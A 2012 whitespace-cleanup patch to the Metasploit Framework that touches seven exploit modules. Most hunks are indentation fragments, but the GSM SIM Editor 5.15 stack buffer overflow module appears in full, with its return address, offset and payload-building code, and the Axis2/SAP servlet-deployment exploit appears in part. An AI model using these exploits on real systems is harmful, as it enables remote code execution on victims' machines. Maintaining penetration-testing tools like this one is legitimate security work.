From 2ee620cee441dc759934dbaa1db2abf0d8d97a30 Mon Sep 17 00:00:00 2001 From: James Lee Date: Thu, 31 May 2012 18:18:27 -0600 Subject: [PATCH] Whitespace, thanks msftidy.rb! --- .../exploits/linux/http/dolibarr_cmd_exec.rb | 2 +- modules/exploits/multi/http/axis2_deployer.rb | 80 +++++----- .../exploits/multi/misc/java_rmi_server.rb | 6 +- .../windows/browser/ms10_002_ie_object.rb | 2 +- .../windows/fileformat/cyberlink_p2g_bof.rb | 2 +- .../exploits/windows/fileformat/gsm_sim.rb | 150 +++++++++--------- .../windows/license/flexnet_lmgrd_bof.rb | 2 +- 7 files changed, 122 insertions(+), 122 deletions(-) diff --git a/modules/exploits/linux/http/dolibarr_cmd_exec.rb b/modules/exploits/linux/http/dolibarr_cmd_exec.rb index 3cf35f8da3..6f7cb3df03 100644 --- a/modules/exploits/linux/http/dolibarr_cmd_exec.rb +++ b/modules/exploits/linux/http/dolibarr_cmd_exec.rb @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote }) return [nil, nil] if not (res and res.headers['Set-Cookie']) - + # Get the session ID from the cookie m = res.headers['Set-Cookie'].match(/(DOLSESSID_.+);/) id = (m.nil?) ? nil : m[1] diff --git a/modules/exploits/multi/http/axis2_deployer.rb b/modules/exploits/multi/http/axis2_deployer.rb index 9c751d5e66..889642fce5 100644 --- a/modules/exploits/multi/http/axis2_deployer.rb +++ b/modules/exploits/multi/http/axis2_deployer.rb @@ -8,13 +8,13 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = ExcellentRanking - HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)|Jetty.*/ ] } + HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)|Jetty.*/ ] } - include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpClient - def initialize(info = {}) + def initialize(info = {}) super(update_info(info, 'Name' => 'Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP)', 'Description' => %q{ @@ -23,18 +23,18 @@ class Metasploit3 < Msf::Exploit::Remote }, 'References' => [ - # General - [ 'URL', 'http://www.rapid7.com/security-center/advisories/R7-0037.jsp' ], - [ 'URL', 'http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf' ], - [ 'CVE', '2010-0219' ], + # General + [ 'URL', 'http://www.rapid7.com/security-center/advisories/R7-0037.jsp' ], + [ 'URL', 'http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf' ], + [ 'CVE', '2010-0219' ], ], 'Platform' => [ 'java', 'win', 'linux' ], # others? 'Targets' => [ [ 'Java', { 'Arch' => ARCH_JAVA, - 'Platform' => 'java' - }, + 'Platform' => 'java' + }, ], # # Platform specific targets only @@ -82,14 +82,14 @@ class Metasploit3 < Msf::Exploit::Remote + mep="http://www.w3.org/2004/08/wsdl/in-only" + class="org.apache.axis2.rpc.receivers.RPCInOnlyMessageReceiver"/> + mep="http://www.w3.org/2004/08/wsdl/in-out" + class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/> - metasploit.PayloadServlet + metasploit.PayloadServlet } @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote zip.add_file("metasploit/PayloadServlet.class", servlet) contents = zip.pack - end + end boundary = rand_text_alphanumeric(6) @@ -134,27 +134,27 @@ class Metasploit3 < Msf::Exploit::Remote return end =begin - res = send_request_raw({ - 'uri' => "/#{datastore['PATH']}/axis2-web/HappyAxis.jsp", - 'method' => 'GET', - 'headers' => - { - 'Cookie' => "JSESSIONID=#{session}", - } - }, 25) - puts res.body - puts res.code - if res.code > 200 and res.code < 300 - if ( res.body.scan(/([A-Z] \Program Files\Apache Software Foundation\Tomcat \d.\d)/i) ) - dir = $1.sub(/: /,':') + "\\webapps\\dswsbobje\\WEB-INF\\services\\" - puts dir - else - if ( a.scan(/catalina\.home<\/th>(.*) <\/td>/i) ) - dir = $1 + "/webapps/dswsbobje/WEB-INF/services/" - puts dir - end - end - end + res = send_request_raw({ + 'uri' => "/#{datastore['PATH']}/axis2-web/HappyAxis.jsp", + 'method' => 'GET', + 'headers' => + { + 'Cookie' => "JSESSIONID=#{session}", + } + }, 25) + puts res.body + puts res.code + if res.code > 200 and res.code < 300 + if ( res.body.scan(/([A-Z] \Program Files\Apache Software Foundation\Tomcat \d.\d)/i) ) + dir = $1.sub(/: /,':') + "\\webapps\\dswsbobje\\WEB-INF\\services\\" + puts dir + else + if ( a.scan(/catalina\.home<\/th>(.*) <\/td>/i) ) + dir = $1 + "/webapps/dswsbobje/WEB-INF/services/" + puts dir + end + end + end =end print_status("Polling to see if the service is ready") @@ -241,7 +241,7 @@ class Metasploit3 < Msf::Exploit::Remote rescue ::Rex::ConnectionError print_error("http://#{rhost}:#{rport}#{rpath}/(rest|services) Unable to authenticate (#{res.code} #{res.message})") end - end + end def cleanup_instructions(rpath, name) print_line("") @@ -256,7 +256,7 @@ class Metasploit3 < Msf::Exploit::Remote print_line("") end - def exploit + def exploit user = datastore['USERNAME'] pass = datastore['PASSWORD'] rpath = datastore['PATH'] @@ -345,4 +345,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end \ No newline at end of file +end diff --git a/modules/exploits/multi/misc/java_rmi_server.rb b/modules/exploits/multi/misc/java_rmi_server.rb index 85ca51e297..b36472cddb 100644 --- a/modules/exploits/multi/misc/java_rmi_server.rb +++ b/modules/exploits/multi/misc/java_rmi_server.rb @@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote # RMI protocol specification [ 'URL', 'http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html'], # Placeholder reference for matching - [ 'MSF', 'java_rmi_server'] + [ 'MSF', 'java_rmi_server'] ], 'DisclosureDate' => 'Oct 15 2011', 'Platform' => ['java', 'win', 'osx', 'linux', 'solaris'], @@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0 )) register_options( [ Opt::RPORT(1099) ], self.class) - + register_autofilter_ports([ 1098, 1099 ]) register_autofilter_services(%W{ rmi rmid java-rmi rmiregistry }) end @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote print_error("Not exploitable: the RMI class loader is disabled") return end - + print_good("Target #{rhost}:#{rport} may be exploitable...") # Wait for the request to be handled diff --git a/modules/exploits/windows/browser/ms10_002_ie_object.rb b/modules/exploits/windows/browser/ms10_002_ie_object.rb index d51b39a25f..b319706025 100644 --- a/modules/exploits/windows/browser/ms10_002_ie_object.rb +++ b/modules/exploits/windows/browser/ms10_002_ie_object.rb @@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => "MS10-002 Internet Explorer Object Memory Use-After-Free", 'Description' => %q{ This module exploits a vulnerability found in Internet Explorer's - mshtml component. Due to the way IE handles objects in memory, it is + mshtml component. Due to the way IE handles objects in memory, it is possible to cause a pointer in CTableRowCellsCollectionCacheItem::GetNext to be used even after it gets freed, therefore allowing remote code execution under the context of the user. diff --git a/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb b/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb index 1b690baa74..e20f435c92 100644 --- a/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb +++ b/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote end def get_payload(hunter) - + [ 'x86/alpha_mixed', 'x86/unicode_mixed' ].each { |name| enc = framework.encoders.create(name) if name =~ /unicode/ diff --git a/modules/exploits/windows/fileformat/gsm_sim.rb b/modules/exploits/windows/fileformat/gsm_sim.rb index a70f4c4ca6..d376bc8213 100644 --- a/modules/exploits/windows/fileformat/gsm_sim.rb +++ b/modules/exploits/windows/fileformat/gsm_sim.rb @@ -1,75 +1,75 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking - - include Msf::Exploit::FILEFORMAT - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'GSM SIM Editor 5.15 Buffer Overflow', - 'Description' => %q{ - This module exploits a stack-based buffer overflow in GSM SIM Editor 5.15. - When opening a specially crafted .sms file in GSM SIM Editor a stack-based buffer - overflow occurs which allows an attacker to execute arbitrary code. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'Ruben Alejandro', - 'chap0 ', - 'Lincoln ' - ], - 'References' => - [ - [ 'EDB', '14258' ] - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Platform' => 'win', - 'Payload' => - { - 'Space' => 2000, - 'BadChars' => "\x00", - 'DisableNops' => true, - 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment #add esp, -3500 - }, - 'Targets' => - [ - [ 'Windows XP SP3', - { - 'Ret' => 0x00405201, # call esp - SIMEditor.exe - 'Offset' => 810 - } - ] - ], - 'Privileged' => false, - 'DisclosureDate' => 'Jul 07 2010', - 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('FILENAME', [ true, 'The file name.', 'msf.sms']), - ], self.class) - - end - - def exploit - buffer = rand_text_numeric(target['Offset']) - buffer << [target.ret].pack('V').unpack("H*")[0] - buffer << make_nops(30).unpack("H*")[0] - buffer << payload.encoded.unpack("H*")[0] - - file_create(buffer) - end - -end +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::FILEFORMAT + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'GSM SIM Editor 5.15 Buffer Overflow', + 'Description' => %q{ + This module exploits a stack-based buffer overflow in GSM SIM Editor 5.15. + When opening a specially crafted .sms file in GSM SIM Editor a stack-based buffer + overflow occurs which allows an attacker to execute arbitrary code. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Ruben Alejandro', + 'chap0 ', + 'Lincoln ' + ], + 'References' => + [ + [ 'EDB', '14258' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Platform' => 'win', + 'Payload' => + { + 'Space' => 2000, + 'BadChars' => "\x00", + 'DisableNops' => true, + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment #add esp, -3500 + }, + 'Targets' => + [ + [ 'Windows XP SP3', + { + 'Ret' => 0x00405201, # call esp - SIMEditor.exe + 'Offset' => 810 + } + ] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Jul 07 2010', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.sms']), + ], self.class) + + end + + def exploit + buffer = rand_text_numeric(target['Offset']) + buffer << [target.ret].pack('V').unpack("H*")[0] + buffer << make_nops(30).unpack("H*")[0] + buffer << payload.encoded.unpack("H*")[0] + + file_create(buffer) + end + +end diff --git a/modules/exploits/windows/license/flexnet_lmgrd_bof.rb b/modules/exploits/windows/license/flexnet_lmgrd_bof.rb index 599e325abc..dc69d352eb 100644 --- a/modules/exploits/windows/license/flexnet_lmgrd_bof.rb +++ b/modules/exploits/windows/license/flexnet_lmgrd_bof.rb @@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'BID', '52718' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-052/' ], [ 'URL', 'http://aluigi.altervista.org/adv/lmgrd_1-adv.txt' ], - [ 'URL', 'http://www.flexerasoftware.com/pl/13057.htm' ] # Vendor advisory + [ 'URL', 'http://www.flexerasoftware.com/pl/13057.htm' ] # Vendor advisory ], 'Privileged' => true, 'DefaultOptions' =>